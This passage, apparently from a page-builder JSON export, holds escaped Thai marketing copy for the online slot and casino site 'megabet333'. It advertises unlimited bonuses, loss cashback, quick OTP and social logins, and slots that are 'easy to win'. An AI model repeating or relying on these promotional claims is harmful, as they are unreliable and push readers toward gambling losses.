\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e48\\u0e32\\u0e22\\u0e43\\u0e2b\\u0e0d\\u0e48 megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 